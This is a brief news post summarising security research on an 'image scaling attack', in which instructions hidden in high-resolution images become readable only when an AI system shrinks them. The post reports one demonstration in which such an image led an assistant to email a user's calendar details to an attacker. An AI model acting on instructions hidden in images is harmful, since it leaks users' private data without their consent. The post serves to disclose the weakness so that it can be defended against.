Post

Hidden Commands in Images Exploit AI Chatbots and Steal Data

A newly discovered vulnerability in AI systems could allow hackers to steal private information by hiding commands in ordinary images. This discovery came from cybersecurity researchers at Trail of Bits, according to which they have found a way to trick AI models by exploiting a common feature: image downscaling. This attack, which has been named an “image scaling attack.”

AI models often automatically reduce the size of large images before processing them. This is where the vulnerability lies. The researchers found a way to create high-resolution images that appear normal to the human eye but contain hidden instructions that become visible only when the image is shrunk by the AI. This “invisible” text, a type of prompt injection, can then be read and executed by the AI without the user’s knowledge.

The researchers demonstrated the attack’s effectiveness on several AI systems, including Google’s Gemini CLI, Gemini’s web interface, and Google Assistant. In one instance, they showed how a malicious image could trigger the AI to access a user’s Google Calendar and email the details to an attacker, all without any confirmation from the user.

To read the complete article see: Hidden Commands in Images Exploit AI Chatbots and Steal Data

This post is licensed under CC BY 4.0 by the author.